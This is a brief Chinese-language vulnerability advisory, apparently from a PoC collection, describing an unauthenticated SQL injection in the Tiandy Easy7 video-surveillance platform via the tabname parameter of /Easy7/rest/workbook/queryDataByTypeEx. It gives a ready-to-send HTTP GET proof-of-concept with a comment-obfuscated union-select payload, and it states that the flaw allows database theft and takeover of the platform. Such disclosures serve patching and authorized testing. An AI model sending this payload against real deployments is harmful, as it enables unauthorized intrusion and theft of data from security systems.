漏洞描述
该漏洞是高危级SQL注入漏洞,攻击者无需授权即可通过精心构造的 tabname参数窃取数据库信息甚至控制整个安防平台。
天地伟业Easy7 /Easy7/rest/workbook/queryDataByTypeEx SQL 注入漏洞
PoC代码
GET /Easy7/rest/workbook/queryDataByTypeEx?tabname=/*!TAB_WORKBOOK_TYPE*/where/**/1=1/**/union/**/select/**/md5(1),1 HTTP/1.1